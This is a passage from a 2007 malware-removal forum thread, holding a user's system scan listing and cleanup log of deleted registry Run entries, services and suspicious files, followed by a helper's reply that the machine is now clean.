CAVTemp -> %SystemRoot%\CAVTemp -> [Folder | Modified Date = 6/1/2007 9:46:04 PM | Attr = ]
Help -> %SystemRoot%\Help -> [Folder | Modified Date = 5/22/2007 2:31:56 PM | Attr = ]
imsins.BAK -> %SystemRoot%\imsins.BAK -> [Ver = | Size = 1374 bytes | Modified Date = 6/15/2007 3:02:44 AM | Attr = ]
INF -> %SystemRoot%\INF -> [Folder | Modified Date = 6/15/2007 3:03:10 AM | Attr = H ]
Installer -> %SystemRoot%\Installer -> [Folder | Modified Date = 6/21/2007 10:29:20 PM | Attr = HS]
Minidump -> %SystemRoot%\Minidump -> [Folder | Modified Date = 5/5/2007 11:19:12 AM | Attr = ]
MSAGENT -> %SystemRoot%\MSAGENT -> [Folder | Modified Date = 4/12/2007 4:09:08 AM | Attr = ]
Prefetch -> %SystemRoot%\Prefetch -> [Folder | Modified Date = 6/21/2007 10:25:30 PM | Attr = ]
quark.ini -> %SystemRoot%\quark.ini -> [Ver = | Size = 33 bytes | Modified Date = 3/30/2007 7:45:48 AM | Attr = ]
SECURITY -> %SystemRoot%\SECURITY -> [Folder | Modified Date = 4/12/2007 4:08:30 AM | Attr = ]
SoftwareDistribution -> %SystemRoot%\SoftwareDistribution -> [Folder | Modified Date = 5/22/2007 2:31:56 PM | Attr = ]
SYSTEM.INI -> %SystemRoot%\SYSTEM.INI -> [Ver = | Size = 227 bytes | Modified Date = 5/31/2007 7:22:14 AM | Attr = ]
SYSTEM32 -> %System32% -> [Folder | Modified Date = 6/21/2007 10:28:54 PM | Attr = ]
Temp -> %SystemRoot%\Temp -> [Folder | Modified Date = 6/21/2007 6:59:34 PM | Attr = ]
WIN.INI -> %SystemRoot%\WIN.INI -> [Ver = | Size = 836 bytes | Modified Date = 5/31/2007 7:22:14 AM | Attr = ]
SA.DAT -> %SystemRoot%\tasks\SA.DAT -> [Ver = | Size = 6 bytes | Modified Date = 6/21/2007 6:59:28 PM | Attr = H ]
CatRoot2 -> %System32%\CatRoot2 -> [Folder | Modified Date = 6/21/2007 10:21:16 PM | Attr = ]
DLLCACHE -> %System32%\DLLCACHE -> [Folder | Modified Date = 6/15/2007 3:03:04 AM | Attr = RHS]
DRIVERS -> %System32%\DRIVERS -> [Folder | Modified Date = 6/21/2007 5:06:48 PM | Attr = ]
FNTCACHE.DAT -> %System32%\FNTCACHE.DAT -> [Ver = | Size = 4350120 bytes | Modified Date = 4/4/2007 4:07:28 AM | Attr = ]
MRT.INI -> %System32%\MRT.INI -> [Ver = | Size = 4701 bytes | Modified Date = 4/12/2007 4:02:06 AM | Attr = ]
NvApps.xml -> %System32%\NvApps.xml -> [Ver = | Size = 0 bytes | Modified Date = 6/21/2007 7:02:54 PM | Attr = ]
PERFC009.DAT -> %System32%\PERFC009.DAT -> [Ver = | Size = 60550 bytes | Modified Date = 6/21/2007 7:04:38 PM | Attr = ]
PERFH009.DAT -> %System32%\PERFH009.DAT -> [Ver = | Size = 398180 bytes | Modified Date = 6/21/2007 7:04:38 PM | Attr = ]
PerfStringBackup.INI -> %System32%\PerfStringBackup.INI -> [Ver = | Size = 465758 bytes | Modified Date = 6/21/2007 7:04:36 PM | Attr = ]
WPA.DBL -> %System32%\WPA.DBL -> [Ver = | Size = 1170 bytes | Modified Date = 6/21/2007 7:12:56 PM | Attr = ]
AvgAsCln.sys -> %System32%\drivers\AvgAsCln.sys -> GRISOFT, s.r.o. [Ver = 1.0.0.14 | Size = 10872 bytes | Modified Date = 5/30/2007 7:10:42 AM | Attr = ]
VetEBoot.sys -> %System32%\drivers\VetEBoot.sys -> Computer Associates International, Inc. [Ver = 30.8.0.0 | Size = 108624 bytes | Modified Date = 6/20/2007 5:25:08 PM | Attr = ]
VetEFile.sys -> %System32%\drivers\VetEFile.sys -> Computer Associates International, Inc. [Ver = 30.8.0.0 | Size = 630432 bytes | Modified Date = 6/20/2007 5:25:08 PM | Attr = ]

[File String Scan - Non-Microsoft Only]
PEC2 , -> %System32%\DFRG.MSC -> [Ver = | Size = 41397 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
winsync , -> %System32%\WBDBASE.DEU -> [Ver = | Size = 1309184 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
Thawte Consulting , -> %System32%\XceedFtp.dll -> Xceed Software Inc (450) 442-2626 support@xceedsoft.com www.xceedsoft.com [Ver = 1.0.42.0 | Size = 236576 bytes | Modified Date = 10/2/2003 6:36:22 PM | Attr = ]
WSUD , UPX0 , -> %System32%\dllcache\hwxjpn.dll -> [Ver = | Size = 13463552 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
PTech , -> %System32%\drivers\mtlstrm.sys -> Smart Link [Ver = 3.80.01MC15 | Size = 1309184 bytes | Modified Date = 8/4/2004 12:41:38 AM | Attr = ]

< End of report >

2) AVG didn't make a report, but it found 3 viruses/trojans

3) Explorer killed successfully
[Processes - Non-Microsoft Only]
Unable to kill process a.exe .
File C:\WINDOWS\SYSTEM32\a.exe not found.
Unable to kill process istjor.exe .
File C:\WINDOWS\SYSTEM32\istjor.exe not found.
Unable to kill process istjor.exe .
File C:\WINDOWS\SYSTEM32\istjor.exe not found.
Unable to kill process istjor.exe .
File C:\WINDOWS\SYSTEM32\istjor.exe not found.
Unable to kill process istjor.exe .
File C:\WINDOWS\SYSTEM32\istjor.exe not found.
Unable to kill process istjor.exe .
File C:\WINDOWS\SYSTEM32\istjor.exe not found.
Unable to kill process istjor.exe .
File C:\WINDOWS\SYSTEM32\istjor.exe not found.
[Win32 Services - Non-Microsoft Only]
Service Microsoft Update RunOnce Service stopped successfully.
Service Microsoft Update RunOnce Service deleted successfully.
C:\WINDOWS\spupdsvc.exe moved successfully.
[Registry - Non-Microsoft Only]
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\MSMSGNER deleted successfully.
File C:\WINDOWS\SYSTEM32\a.exe not found.
Registry value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\MoneyAgent deleted successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Explorer Bars\{32683183-48a0-441b-a342-7c2a440a9478} deleted successfully.
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar\\{BA52B914-B692-46c4-B683-905236F6F655} deleted successfully.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} deleted successfully.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{08B0E5C0-4FCB-11CF-AAA5-00401C608501} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{08B0E5C0-4FCB-11CF-AAA5-00401C608501} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{CD67F990-D8E9-11d2-98FE-00C0F0318AFE} deleted successfully.
Registry key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel deleted successfully.
[Files/Folders - Created Within 90 days]
DllUnregisterServer procedure not found in C:\WINDOWS\spupdsvc.dll
C:\WINDOWS\spupdsvc.dll NOT unregistered.
C:\WINDOWS\spupdsvc.dll moved successfully.
File C:\WINDOWS\spupdsvc.exe not found!
DllUnregisterServer procedure not found in C:\WINDOWS\spupdsvcHook.dll
C:\WINDOWS\spupdsvcHook.dll NOT unregistered.
C:\WINDOWS\spupdsvcHook.dll moved successfully.
File C:\WINDOWS\SYSTEM32\a.exe not found!
LoadLibrary failed for C:\WINDOWS\SYSTEM32\iaxcfg32.dll
C:\WINDOWS\SYSTEM32\iaxcfg32.dll NOT unregistered.
C:\WINDOWS\SYSTEM32\iaxcfg32.dll moved successfully.
File C:\WINDOWS\SYSTEM32\istjor.exe not found!
File C:\WINDOWS\SYSTEM32\ktzobo.exe not found!
C:\WINDOWS\SYSTEM32\wmism23delete.exe moved successfully.
[Files/Folders - Modified Within 90 days]
File C:\WINDOWS\spupdsvc.dll not found!
File C:\WINDOWS\spupdsvc.exe not found!
File C:\WINDOWS\spupdsvcHook.dll not found!
File C:\WINDOWS\SYSTEM32\a.exe not found!
File C:\WINDOWS\SYSTEM32\iaxcfg32.dll not found!
File C:\WINDOWS\SYSTEM32\istjor.exe not found!
File C:\WINDOWS\SYSTEM32\ktzobo.exe not found!
File C:\WINDOWS\SYSTEM32\wmism23delete.exe not found!
[File String Scan - Non-Microsoft Only]
File C:\WINDOWS\spupdsvc.exe not found!
C:\WINDOWS\SYSTEM32\TFTP1296 moved successfully.
[Empty Temp Folders]
C:\DOCUME~1\THESTE~1\LOCALS~1\Temp\ -> emptied.
C:\Documents and Settings\The Stensberg's\Local Settings\Temporary Internet Files\Content.IE5\ -> emptied
RecycleBin -> emptied.
< End of log >
Created on 06/21/2007 17:05:42

#7 OldTimer

OldTimer

    Malware Expert


  • Members
  • 11,092 posts
  • Gender:Male
  • Location:North Carolina
  • Local time:03:36 PM

Posted 23 June 2007 - 07:44 AM

Hi DigitalFool. Everything looks good in the log! You are good to go :thumbsup:

Cheers.

OT
I do not respond to PM's requesting help. That's what the forums are here for. Please use them so that others may benefit from your questions and the responses you receive.
OldTimer




